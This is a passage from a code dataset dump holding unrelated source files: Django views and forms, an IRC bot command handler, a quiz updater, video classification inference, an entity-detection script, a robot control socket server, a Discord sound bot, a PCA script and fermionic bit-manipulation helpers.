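\n# NOTE: main_view and page_view deliberately pin fixed MainContent rows (id=1 for the\n# main page template, id=3 for the elerhetosegek/contact page); the id URL parameter is\n# currently unused by both views.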
\"img\" : instance.image\n\n\n }\n return render(request, \"elerhetosegek.html\", context)\n\ndef main_update(request, id=None):\n \n\n instance = get_object_or_404(MainContent, id=id)\n form = MainContentForm(request.POST or None,request.FILES or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n # messages.success(request, \"Sikeresen frissítve..\")\n\n return HttpResponseRedirect('/')\n else:\n # messages.error(request,\"Sikertelen frissítés... :(\")\n print(\"Sikertelen létrhozas!\")\n \n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"form\" : form\n\n }\n \n\n return render(request, \"post_form.html\", context)\n\n\ndef main_delete(request, slug=None):\n if request.user.is_staff or request.user.is_superuser:\n\n instance = get_object_or_404(Post, slug=slug )\n instance.delete()\n messages.success(request,\"Deleted!\")\n return redirect(\"posts:list\")\n else:\n raise Http404\n\n","sub_path":"MainContent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275192144","text":"from django import forms\n\nfrom .models import Post\n\n\nclass PostModelForm(forms.ModelForm):\n tags = forms.CharField(label='tag', required=False)\n\n class Meta:\n model = Post\n fields = [\"title\", \"image\"]\n\n def clean_title(self):\n title = self.cleaned_data.get(\"title\")\n if len(title) <= 3:\n raise forms.ValidationError(\n \"Length has to be more than 3 character\"\n )\n return title\n","sub_path":"posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414667695","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\aioyoyo\\cmdhandler.py\n# Compiled at: 2017-03-02 21:01:17\n# Size of source mod 2**32: 7190 bytes\nimport inspect, logging, traceback\nfrom .oyoyo.parse import parse_nick\nfrom .oyoyo.cmdhandler import CommandError, NoSuchCommandError, ProtectedCommandError, IRCClientError\nfrom . import helpers\n\ndef protected(func):\n \"\"\"Decorator to protect functions from being called as commands\"\"\"\n func.protected = True\n return func\n\n\nclass CommandHandler(object):\n __doc__ = ' The most basic CommandHandler '\n\n def __init__(self, client):\n self.client = client\n\n @protected\n def get(self, in_command_parts):\n \"\"\"Finds a command\n commands may be dotted. each command part is checked that it does\n not start with and underscore and does not have an attribute\n \"protected\". 
if either of these is true, ProtectedCommandError\n is raised.\n its possible to pass both \"command.sub.func\" and\n [\"command\", \"sub\", \"func\"].\n \"\"\"\n if isinstance(in_command_parts, bytes):\n in_command_parts = in_command_parts.split('.'.encode())\n else:\n if isinstance(in_command_parts, str):\n in_command_parts = in_command_parts.split('.')\n command_parts = in_command_parts[:]\n p = self\n while command_parts:\n cmd = command_parts.pop(0)\n if type(cmd) is bytes:\n cmd = cmd.decode()\n if cmd.startswith('_'):\n raise ProtectedCommandError(in_command_parts)\n try:\n f = getattr(p, cmd)\n except AttributeError:\n raise NoSuchCommandError(in_command_parts)\n\n if hasattr(f, 'protected'):\n raise ProtectedCommandError(in_command_parts)\n if isinstance(f, CommandHandler):\n if command_parts:\n return f.get(command_parts)\n p = f\n\n return f\n\n @protected\n async def run(self, command, *args):\n \"\"\"Finds and runs a command\"\"\"\n logging.debug('processCommand %s(%s)' % (command, args))\n logging.info('processCommand %s(%s)' % (command, args))\n try:\n f = self.get(command)\n except NoSuchCommandError:\n (self.__unhandled__)(command, *args)\n return\n else:\n logging.debug('f %s' % f)\n try:\n await f(self.client, *args)\n except Exception as e:\n logging.error('command raised %s' % e)\n logging.error(traceback.format_exc())\n raise CommandError(command)\n\n @protected\n def __unhandled__(self, cmd, *args):\n \"\"\"The default handler for commands. Override this method to\n apply custom behavior (example, printing) unhandled commands.\n \"\"\"\n logging.debug('unhandled command %s(%s)' % (cmd, args))\n\n\nclass DefaultCommandHandler(CommandHandler):\n __doc__ = ' CommandHandler that provides methods for the normal operation of IRC.\\n If you want your bot to properly respond to pings, etc, you should subclass this.\\n '\n\n async def ping(self, prefix, server):\n \"\"\"Called on PING command, sends back PONG\"\"\"\n self.client.send('PONG', server)\n\n\nclass DefaultBotCommandHandler(CommandHandler):\n __doc__ = 'Default command handler for bots. 
Methods/Attributes are made\\n available as commands '\n\n @protected\n def getVisibleCommands(self, obj=None):\n \"\"\"Gets all visible commands, protected\"\"\"\n test = lambda x: isinstance(x, CommandHandler) or inspect.ismethod(x) or inspect.isfunction(x)\n members = inspect.getmembers(obj or self, test)\n return [m for m, _ in members if not m.startswith('_') if not hasattr(getattr(obj, m), 'protected')]\n\n async def help(self, sender, dest, arg=None):\n \"\"\"List all available commands or get help on a specific command\"\"\"\n logging.info('help sender=%s dest=%s arg=%s' % (sender, dest, arg))\n if not arg:\n commands = self.getVisibleCommands()\n commands.sort()\n await helpers.msg(self.client, dest, 'available commands: %s' % ' '.join(commands))\n else:\n try:\n f = self.get(arg)\n except CommandError as e:\n await helpers.msg(self.client, dest, str(e))\n return\n\n doc = f.__doc__.strip() if f.__doc__ else 'No help available'\n if not inspect.ismethod(f):\n subcommands = self.getVisibleCommands(f)\n if subcommands:\n doc += ' [sub commands: %s]' % ' '.join(subcommands)\n await helpers.msg(self.client, dest, '%s: %s' % (arg, doc))\n\n\nclass BotCommandHandler(DefaultCommandHandler):\n __doc__ = 'Complete command handler for bots'\n\n def __init__(self, client, command_handler):\n DefaultCommandHandler.__init__(self, client)\n self.command_handler = command_handler\n\n async def privmsg(self, prefix, dest, msg):\n \"\"\"Called when privmsg command is received, just awaits\n BotCommandHandler.tryBotCommand with the same args\"\"\"\n await self.tryBotCommand(prefix, dest, msg)\n\n @protected\n async def tryBotCommand(self, prefix, dest, msg):\n \"\"\"Tests a command to see if its a command for the bot, returns True\n and calls self.processBotCommand(cmd, sender) if its is.\n \"\"\"\n logging.debug(\"tryBotCommand('%s' '%s' '%s')\" % (prefix, dest, msg))\n if dest == self.client.nick:\n dest = parse_nick(prefix)[0]\n else:\n if msg.startswith(self.client.nick):\n msg = msg[len(self.client.nick) + 1:]\n else:\n return False\n msg = msg.strip()\n parts = msg.split(' ', 1)\n command = parts[0]\n arg = parts[1:]\n try:\n await (self.command_handler.run)(command, prefix, dest, *arg)\n except CommandError as e:\n await helpers.msg(self.client, dest, str(e))\n\n return True","sub_path":"pycfiles/aioyoyo-1.2.2-py3.6/cmdhandler.cpython-36.py","file_name":"cmdhandler.cpython-36.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148898696","text":"\nimport urllib\nimport urllib2\nimport zope.app.appsetup.product\nimport zope.interface\nimport zope.component\nimport zeit.content.quiz.interfaces\n\n\nclass Updater(object):\n\n zope.component.adapts(zeit.content.quiz.interfaces.IQuiz)\n zope.interface.implements(zeit.content.quiz.interfaces.IQuizUpdater)\n\n def __init__(self, context):\n self.context = context\n\n def update(self):\n url = self.get_url()\n if url:\n urllib2.urlopen(url, self.get_data())\n\n def get_url(self):\n config = zope.app.appsetup.product.getProductConfiguration(\n 'zeit.content.quiz')\n if config:\n return config.get('url')\n\n def get_data(self):\n data = dict(\n quiz_id=self.context.uniqueId.replace('http://xml.zeit.de', '', 1),\n action='preview',\n xml=zeit.cms.content.interfaces.IXMLSource(self.context))\n return urllib.urlencode(sorted(data.items()))\n\n\n@zope.component.adapter(\n zeit.content.quiz.interfaces.IQuiz,\n 
zeit.cms.checkout.interfaces.IAfterCheckinEvent)\ndef update_after_checkin(context, event):\n updater = zeit.content.quiz.interfaces.IQuizUpdater(context)\n updater.update()\n","sub_path":"src/zeit/content/quiz/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564796033","text":"\n\nfrom .att_models import *\nfrom .reader import readShortVideo\nfrom .reader import getVideoList\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom os import listdir\nimport sys\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nimport torchvision\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nimport skimage.io\nimport skimage\nimport pickle\n\ndef norm(image):\n\n transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Pad((0,40), fill=0, padding_mode='constant'),\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n return transform(image)\n\ndef main():\n arg = sys.argv\n\n video_path = arg[1]\n out_file = arg[2]\n\n model = Resnet50(pretrained=False).cuda()\n model.load_state_dict(torch.load(os.path.join(\n \"p3/att_final\", \"encode_model.pth\")))\n model.eval()\n classifier = Classifier().cuda()\n classifier.load_state_dict(torch.load(os.path.join(\n #\"p3/final\", \"model_0.574513.pkt\")))\n #\"p3/final\", \"model_0.579884.pkt\")))\n \"p3/att_final\", \"model_0.605840.pkt\")))\n classifier.eval()\n\n # out_file = \"./output\"\n # video_path = \"hw4_data/FullLengthVideos/videos/valid/\"\n # label_path = \"hw4_data/FullLengthVideos/labels/valid/\"\n\n category_list = sorted(os.listdir(video_path))\n\n valid_video_feature = []\n for category in category_list:\n print(\"Category: \", category)\n out_txt = os.path.join(out_file, category+\".txt\")\n category_frames = []\n frame_output = []\n img_file_list = sorted(os.listdir(os.path.join(video_path, category)))\n valid_lengths = len(img_file_list)\n\n for img in img_file_list:\n image_rgb = skimage.io.imread(os.path.join(video_path, category,img))\n image_nor = norm(image_rgb).view((1,3,224,224)).cuda()\n feature = model(image_nor).data.view(2048).unsqueeze(0)\n \n category_frames.append(feature)\n \n category_frames = torch.cat(category_frames, dim=0)\n category_frames = category_frames.unsqueeze(0)\n \n pred = classifier(category_frames, [category_frames.size(1)])\n\n prediction = torch.argmax(torch.squeeze(pred.cpu()),1).data.numpy()\n\n # print(prediction.shape)\n\n for i in range(len(prediction)):\n if i == 0:\n continue\n elif i > 0 and i<(len(prediction)-1):\n if prediction[i-1] == prediction[i+1]:\n prediction[i] = prediction[i-1]\n \n # exit()\n\n with open(os.path.join(out_txt), \"w+\") as f:\n for p in prediction:\n f.write(str(p)+'\\n')\n\nif __name__ == '__main__':\n #print(config)\n main()","sub_path":"p3/att_inference.py","file_name":"att_inference.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"489479542","text":"from cloudrail.knowledge.context.gcp.gcp_environment_context import GcpEnvironmentContext\nfrom cloudrail.knowledge.context.gcp.resources.binary_authorization.gcp_binary_authorization_policy import GcpBinaryAuthorizationAdmissionRule, 
\\\n GcpBinaryAuthorizationAdmissionRuleType, GcpBinaryAuthorizationAdmissionEvaluationMode, GcpBinaryAuthorizationAdmissionEnforcementMode\n\nfrom tests.knowledge.context.gcp_context_test import GcpContextTest\nfrom tests.knowledge.context.test_context_annotation import context\n\n\nclass TestBinaryAuthorizationPolicy(GcpContextTest):\n def get_component(self):\n return 'binary_authorization_policy'\n\n @context(module_path=\"basic\")\n def test_basic(self, ctx: GcpEnvironmentContext):\n policy = next((policy for policy in ctx.binary_authorization_policies if policy.project_id == 'dev-for-tests'), None)\n self.assertIsNotNone(policy)\n self.assertFalse(policy.global_policy_evaluation_mode_enabled)\n self.assertEqual(policy.default_admission_rule,\n GcpBinaryAuthorizationAdmissionRule(GcpBinaryAuthorizationAdmissionRuleType.DEFAULT,\n GcpBinaryAuthorizationAdmissionEvaluationMode.ALWAYS_DENY,\n GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,\n None))\n self.assertTrue(len(policy.cluster_admission_rules), 1)\n self.assertEqual(policy.cluster_admission_rules[0],\n GcpBinaryAuthorizationAdmissionRule(GcpBinaryAuthorizationAdmissionRuleType.CLUSTER,\n GcpBinaryAuthorizationAdmissionEvaluationMode.REQUIRE_ATTESTATION,\n GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,\n 'us-west1-a.gke-cluster-007'))\n container_cluster = next((cluster for cluster in ctx.container_clusters if cluster.name == 'gke-cluster-007'), None)\n self.assertIsNotNone(container_cluster)\n self.assertTrue(len(container_cluster.binary_auth_policies), 2)\n self.assertTrue(any(policy.enforcement_mode == GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG\n for policy in container_cluster.binary_auth_policies))\n","sub_path":"tests/knowledge/context/gcp/test_binary_authorization_policy.py","file_name":"test_binary_authorization_policy.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"143120152","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\n\ndef convert_to_query_text(datadir, outdir):\n files = [(\"main-valid-results\", \"val\"), (\"main-test-results\", \"test\")]\n for f_tuple in files:\n f = f_tuple[0]\n fname = f_tuple[1]\n in_fpath = os.path.join(datadir, f + \".txt\")\n out_fpath = os.path.join(outdir, fname + \".txt\")\n notfound = 0\n total = 0\n outfile = open(out_fpath, 'w')\n print(\"processing dataset: {}\".format(fname))\n with open(in_fpath, 'r') as f:\n for i, line in enumerate(f):\n total += 1\n if i % 1000000 == 0:\n print(\"line: {}\".format(i))\n\n items = line.strip().split(\" %%%% \")\n if len(items) != 3:\n print(\"ERROR: line - {}\".format(line))\n sys.exit(1)\n\n lineid = items[0].strip()\n tokens = items[1].strip().split()\n tags = items[2].strip().split()\n\n query_tokens = []\n for token, tag in zip(tokens, tags):\n if tag == \"I\":\n query_tokens.append(token)\n\n query_text = \" \".join(query_tokens)\n\n line_to_print = \"{} %%%% {}\".format(lineid, query_text)\n # print(line_to_print)\n outfile.write(line_to_print + \"\\n\")\n\n print(\"done with dataset: {}\".format(fname))\n print(\"notfound: {}\".format(notfound))\n print(\"found: {}\".format(total-notfound))\n print(\"-\" * 60)\n outfile.close()\n print(\"DONE!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Get the gold query text after entity detection')\n parser.add_argument('-d', '--dataset', dest='dataset', 
action='store', required = True,\n help='path to the results directory after entity detection')\n parser.add_argument('-o', '--output', dest='output', action='store', required=True,\n help='output directory for the query text')\n\n args = parser.parse_args()\n print(\"Dataset: {}\".format(args.dataset))\n print(\"Output: {}\".format(args.output))\n\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n convert_to_query_text(args.dataset, args.output)\n print(\"Converted the results after entity detection to query text.\")\n","sub_path":"ferhan_simple_qa_rnn/entity_detection/results_to_query.py","file_name":"results_to_query.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644265964","text":"import asyncio\nfrom aiohttp import web\nimport socketio\nimport hexdump\nfrom log import logname\nfrom firmware import Shield\nfrom system import System\nfrom version import version_info\n\nlogger = logname(\"sockets\")\n\nclass WSnamespace(socketio.AsyncNamespace):\n def __init__(self, namespace='/sockets'):\n super().__init__(namespace)\n self.sio = None\n self.shield = Shield()\n self.system = System()\n\n async def on_connect(self, sid, environ):\n logger.info(\"connected %s\", sid)\n await self.sio.emit('connected', {\n 'tcs_ver' : version_info,\n 'firmware_ver' : self.shield.getFirmwareVersion(),\n 'wifi_dongle' : self.system.getWirelessAdapterInfo(),\n 'video_devices': self.system.getCameraInfo()\n }, namespace=\"/sockets\")\n\n\n async def on_motors(self, sid, payload):\n self.shield.setMotors(payload)\n await self.sio.emit('response', \"motors set\", namespace=\"/sockets\")\n\n async def on_manipulator(self, sid, payload):\n self.shield.setManipulator(payload)\n await self.sio.emit('response', 'manipulator set', namespace=\"/sockets\")\n\n async def on_gripper(self, sid, payload):\n self.shield.setGripper(payload)\n await self.sio.emit('response', 'gripper set', namespace=\"/sockets\")\n\n async def on_telemetry(self, sid):\n await self.sio.emit('telemetry', {\n 'temperature': self.system.getTemperature(),\n 'battery': self.shield.getBattery(),\n 'signal': self.system.getSignal()\n }, namespace=\"/sockets\")\n\n async def on_clupi(self, sid, payload):\n self.shield.setClupi(payload['angle'], payload['transl'])\n await self.sio.emit('response', 'clupi set', namespace=\"/sockets\")\n\n\n async def on_shutdown(self, sid):\n self.system.shutdown() \n \n async def on_reboot(self, sid):\n self.system.reboot()\n\n async def set_flip_state(self, direction):\n await self.sio.emit('response', {\"type\": \"preventFlip\", \"value\": direction }, namespace=\"/sockets\")\n\n\nclass WSserver():\n def __init__(self, app):\n super().__init__()\n self.sio = None\n self.namespace = WSnamespace('/sockets')\n self.app = app\n \n def start(self):\n self.sio = socketio.AsyncServer(async_mode='aiohttp')\n self.sio.register_namespace(self.namespace)\n self.namespace.sio = self.sio\n self.sio.attach(self.app)\n\n","sub_path":"server/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157864594","text":"import asyncio\nimport discord\nimport os, time\nfrom discord.ext import commands\n\nfrom gtts import gTTS\n\nimport logger as log\nlogger = log.getLogger(__name__)\n\nclass Sounds(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n self.voice = None\n 
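# index letters used by the soundlist command below to group the available sounds alphabetically in the embed\n        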
self.alphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\n        logger.info(\"Sound constructor finished\")\n\n        if not os.path.isdir(\"tmp\"):\n            logger.info(\"tmp folder does not exist, creating...\")\n            os.mkdir('tmp')\n\n    def cog_unload(self):\n        pass\n\n    def cog_check(self, ctx: commands.Context):\n        if not ctx.guild:\n            raise commands.NoPrivateMessage('This command can\\'t be used in DM channels.')\n\n        return True\n    \n    async def cog_command_error(self, ctx: commands.Context, error: commands.CommandError):\n        await ctx.send(ctx.author.mention+\" Sound error, look at this: \"+ str(error))\n\n    async def _removeFile(self, path):\n        \"\"\"Removes the file at the given path\"\"\"\n\n        logger.info(\"Removing file: \"+path)\n        os.remove(path)\n\n    async def _playInChannel(self, channel, path, removeFile=False):\n        \"\"\"Plays the file at the given path in the given channel\"\"\"\n\n        logger.info(\"Playing sound in channel: ChannelId: \"+str(channel.id)+\" ChannelName: \"+str(channel.name)+\" Path: \"+str(path)) \n\n        self.voice = await channel.connect()\n        await asyncio.sleep(0.5) \n        self.voice.play(discord.FFmpegPCMAudio(path))  # the loop below waits until playback finishes, then disconnects\n        while(self.voice.is_playing()):\n            await asyncio.sleep(1)\n        await self.voice.disconnect()\n\n        if removeFile:\n            await self._removeFile(path)\n\n    async def _play(self, ctx: commands.Context, soundType=None, targetFolder=None, targetChannel=None, removeFile=False):\n        \"\"\"Abstract sound command to play in a given context\"\"\"\n\n        logger.info(\"Playing sound in context: GuildId: \"+str(ctx.guild.id)+\" ChannelId: \"+str(ctx.channel.id)+\" AuthorId: \"+str(ctx.author.id))\n\n        path = targetFolder+soundType+'.mp3'\n        if not os.path.isfile(path):\n            await ctx.send(\"File search failed. 
File: \"+soundType)\n return\n\n if len(self.bot.voice_clients) == 0:\n member = ctx.message.author\n for channel in member.guild.channels:\n if channel.type == discord.ChannelType.voice:\n if channel.name == targetChannel:\n await ctx.send(\"Playing now: \"+soundType)\n await self._playInChannel(channel, path, removeFile=removeFile)\n return \n if targetChannel == None:\n for m in channel.voice_states:\n if m == member.id:\n await ctx.send(\"Playing now: \"+soundType)\n await self._playInChannel(channel, path, removeFile=removeFile)\n return\n await ctx.send(\"No channel found to play: \"+soundType)\n else:\n await ctx.send(\"Impossible to play: \"+soundType)\n\n @commands.command(name='sound')\n async def _sound(self,ctx: commands.Context,soundType):\n \"\"\"Arrives to you and plays your favourite sound\"\"\"\n\n await self._play(ctx, soundType, \"./audio/\")\n\n @commands.command(name='soundchannel')\n @commands.has_permissions(manage_guild=True)\n async def _soundchannel(self, ctx: commands.Context,soundType, *args):\n \"\"\"Arrives to you and plays your favourite sound in given channel\"\"\"\n\n channel = None\n if len(args) > 0:\n channel = ' '.join(args)\n\n logger.info(\"Playing sound: \"+soundType+ \" in channel: \"+str(channel))\n\n await self._play(ctx, soundType, \"./audio/\", targetChannel=channel)\n\n @commands.command(name=\"soundtts\")\n async def _soundtts(self, ctx: commands.Context, *args):\n \"\"\"Arrives to you and plays given message\"\"\"\n\n logger.info(\"Joining channel and speaking message: \"+str(args))\n\n tmpName = str(int(time.time()*1000.0))\n text = ''\n\n if len(args) == 0:\n await ctx.send(\"No message given\")\n return\n \n text = ' '.join(args)\n tts = gTTS(text=text, lang='pl')\n tts.save('tmp/'+tmpName+'.mp3')\n\n await self._play(ctx, soundType=tmpName, targetFolder=\"./tmp/\", removeFile=True)\n\n @commands.command(name='soundlist')\n async def _soundList(self, ctx: commands.Context):\n \"\"\"Prints the list of all avaible sounds\"\"\"\n\n logger.info(\"List of sounds\")\n\n embed = discord.Embed(title=\"Sounds list\",description=\"All of the sounds\",color=0x076500)\n\n sounds = os.listdir('./audio')\n\n for char in self.alphabet:\n s = ''\n for sound in sounds:\n if sound[:1].upper() == char:\n s += sound[:-4] + '\\n'\n if s != '':\n embed.add_field(name=char, value=s)\n\n await ctx.send(embed=embed)\n\n @commands.command(name='soundupload')\n @commands.has_permissions(manage_guild=True)\n async def _uploadSound(self, ctx: commands.Context):\n \"\"\"Attach a sound to be uploaded with this command\"\"\"\n \n logger.info(\"Uploading sound\")\n\n if len(ctx.message.attachments) == 1:\n file = ctx.message.attachments[0].filename\n path = \"audio/{}\".format(file)\n if file.endswith(\".mp3\") and not os.path.isfile(path):\n await ctx.message.attachments[0].save(fp=path)\n logger.info(\"Uploaded sound: {}\".format(file))\n\n @commands.command(name='soundrm')\n @commands.has_permissions(manage_guild=True)\n async def _removeSound(self, ctx: commands.Context, sound):\n \"\"\"Removes a given sound\"\"\"\n \n logger.info(\"Removing sound: \"+sound)\n\n try:\n path = './audio/'+sound+'.mp3' \n os.remove(path) \n await ctx.send('Removed: '+sound)\n except Exception:\n raise\n\nasync def setup(bot):\n \"\"\"Add component\"\"\"\n\n logger.info(\"Adding cog \" + __name__)\n await 
bot.add_cog(Sounds(bot))\n","sub_path":"sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230793939","text":"import sys\nimport numpy as np\n\ndef main():\n\n #First arg is dataFile and second arg is labelsfile\n\n if len(sys.argv) != 3:\n print(sys.argv[0], \"takes 2 arguments. Not \", len(sys.argv) - 1)\n sys.exit()\n\n first = sys.argv[1]\n second = sys.argv[2]\n print(sys.argv[0], \"args are:\", first, second)\n\n # Read numpy array from a file\n\n # The file f1.txt has two rows. First row is 1 2 seond row is 3 4\n Y = np.genfromtxt(second) # default delimiter is space\n print(\"Y=\", Y)\n\n # The file f2.txt : First row is 1, 2 seond row is 3, 4\n Xt = np.genfromtxt(first, delimiter=',', autostrip=True) # trip spaces\n print(\"X=\", Xt)\n n,m=Xt.shape\n\n # calculate mu = mean xi\n mu = np.mean(Xt, axis=0)\n mu=mu.reshape(m,1)\n\n #Input ends and PCA algorithm starts\n R=np.dot((Xt.T)-mu,((Xt.T)-mu).T)\n print(\"R=\",R)\n\n #Now since R by it's property is symmetric but still to avoid any complication assume non-symmetric\n #Computing eigen values and eigen vectors of R\n evals, evecs = np.linalg.eig(R)\n print(\"evals=\", evals, \" evecs=\", evecs)\n\n #The Eigen values and eigen vectors are not necessarily be sorted bcz eig() is used nd not eigh(), so sort them.\n idx = np.argsort(evals)[::-1]\n evals = evals[idx]\n evecs = evecs[:, idx]\n print(\"evals=\", evals, \" evecs=\", evecs) # evectors are the cols of evecs\n\n #now we need to extract the k=2 features out of the available features, here 4\n #Hence we need top 2 evectors(columns) corresponding to the top 2 max. evalues\n v1v2=evecs[:,[0,1]]\n print(\"v1v2=\",v1v2)\n\n #Computing the projections\n proj=np.dot((v1v2.T),(Xt.T))\n #Need to transpose the proj because it's dimensions are 2xn\n proj=proj.T # proj is now nx2 similar dimension as the input data\n print(\"Proj=\",proj)\n\n # Write array to a file\n np.savetxt(first+'_pca2_output', proj, delimiter=',')\n\n\nif __name__ == '__main__':\n main()","sub_path":"pca2.py","file_name":"pca2.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262202793","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : huxiansheng (you@example.org)\n\nimport xlrd\n\n# 获取登录需要的账号密码\nclass login_data():\n\n def get_loginvalue(self):\n loginvalues = []\n loginvalue = xlrd.open_workbook(r'C:\\Users\\Administrator\\Desktop\\Skin01\\get_excel\\Excel_info\\loginvalue.xls')\n table = loginvalue.sheet_by_name(u'Sheet1') # 通过名称获取\n nrows = table.nrows # 获取行数\n if nrows > 1:\n for i in range(nrows - 1):\n x = table.row_values(i + 1)\n loginvalues.append(x)\n return loginvalues\n else:\n return None\n # loginvalues[username] = password\n\n\n# a = login_data().get_loginvalue()\n# print(a)","sub_path":"get_excel/login_data.py","file_name":"login_data.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646970416","text":"\"\"\"\nFunctions used for fermionic multiplication. 
These are written for multiplication in the Nambu basis (c_i,UP^dag, c_i,DOWN), so be careful using them elsewhere!\n\"\"\"\n\n\n# BITWISE FUNCTIONS ##################################################\n\ndef bitCount(int_type):\n\t\"\"\"Returns the number of bits that are equal to 1 in the binary form of the integer int_type.\"\"\"\n\tcount = 0\n\twhile(int_type):\n\t\tint_type &= int_type - 1\n\n\t\tcount += 1\n\treturn(count)\n\ndef clearBit(int_type, offset):\n\t\"\"\"Sets the bit at offset to 0.\"\"\"\n\tmask = ~(1 << offset)\n\treturn(int_type & mask)\n\ndef flipBit(int_type, offset):\n\t\"\"\"Flips the bit at position offset in the integer int_type.\"\"\"\n\tmask = 1 << offset\n\treturn(int_type ^ mask)\n\ndef testBit(int_type, offset):\n    \"\"\"Returns a nonzero value if the bit at position offset in int_type is set, and 0 otherwise.\"\"\"\n    mask = 1 << offset\n    return(int_type & mask)\n\ndef countSetBits(n): \n\t\"\"\"Counts the number of bits that are set to 1 in a given integer.\"\"\"\n\tcount = 0\n\twhile (n): \n\t\tcount += n & 1\n\t\tn >>= 1\n\treturn count \n\n# FERMIONIC MULTIPLICATION ###########################################\n\ndef fmulti_cr(m, i, s, N):\n\t\"\"\"Multiplies the state |m> with c_i,s^dag. N is the number of energy levels, and is len(bin(m))//2. Spin: UP = 0, DOWN = 1.\n\tReturns [±1, integer], where ±1 specifies the sign prefactor, and bin(integer) is the resulting state. If the multiplication is not possible, returns (1, None).\n\t\"\"\"\n\n\tnew_m = flipBit(m, 2*N - (2*i+1+s)) #flips 2*i-th bit in m\n\n\tif new_m > m: #the operator can act, the result is new_m, with a prefactor ±1\n\t\treturn prefactor_cr(m, i, s, N), new_m \n\n\tif new_m < m: #the operator destroys the state; return None (this must not be return 0, as |00...> is also a valid state!)\n\t\treturn 1, None\n\ndef prefactor_cr(m, i, s, N):\n\t\"\"\"Calculates the sign prefactor, obtained when multiplying the state |m> with c_i,s^dag. Spin: UP = 0, DOWN = 1.\n\tN is the number of energy levels, and is len(bin(m))//2. Takes bin(m), sets all its bits from position 2N down to the ith to 0 and counts\n\thow many of the remaining bits are equal to 1.\"\"\"\n\n\tnew_num = m\n\t#set bits to zero\n\tfor j in range(0, 2*N - ((2*i)+1+s)):\n\t\tnew_num = clearBit(new_num, j) \n\t\n\t#count the remaining 1s\n\tcount = bitCount(new_num)\n\t\n\treturn (-1)**count\n\ndef fmulti_an(m, i, s, N):\n\t\"\"\"Multiplies the state |m> with c_i,s. N is the number of energy levels, and is len(bin(m))//2. Spin: UP = 0, DOWN = 1.\n\tReturns [±1, integer], where ±1 specifies the sign prefactor, and bin(integer) is the resulting state. If the multiplication is not possible, returns (1, None).\n\t\"\"\"\n\n\tnew_m = flipBit(m, 2*N - ((2*i)+1+s)) #flips 2*i+1-th bit in m\n\n\tif new_m < m:\t#the operator can act, the result is new_m, with a prefactor ±1\n\t\treturn prefactor_an(m, i, s, N), new_m \n\n\n\tif new_m > m: #the operator destroys the state; return None (this must not be return 0, as |00...> is also a valid state!)\n\t\treturn 1, None\n\t\ndef prefactor_an(m, i, s, N):\n\t\"\"\"Calculates the sign prefactor, obtained when multiplying the state |m> with c_i,s. Spin: UP = 0, DOWN = 1.\n\tN is the number of energy levels, and is len(bin(m))//2. Takes bin(m), sets all its bits from position 2N down to the ith to 0\n\tand counts how many of the remaining bits are equal to 1.\"\"\"\n\n\tnew_num = m\n\t#set bits to zero\n\tfor j in range(0, 2*N - ((2*i)+s)):\n\t\tnew_num = clearBit(new_num, j) \n\t\n\t#count the remaining 1s\n\tcount = bitCount(new_num)\n\t\n\treturn (-1)**count\n\ndef number_op(state, i, s, N):\n\t\"\"\"Calculates the result of a number operator acting on a given state (a linear superposition of |m>) at position i with spin s. Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state={}\n\n\tfor m in state:\n\t\tif s == 0:\n\t\t\tnew_m = flipBit(m, 2*N - (2*i+1)) 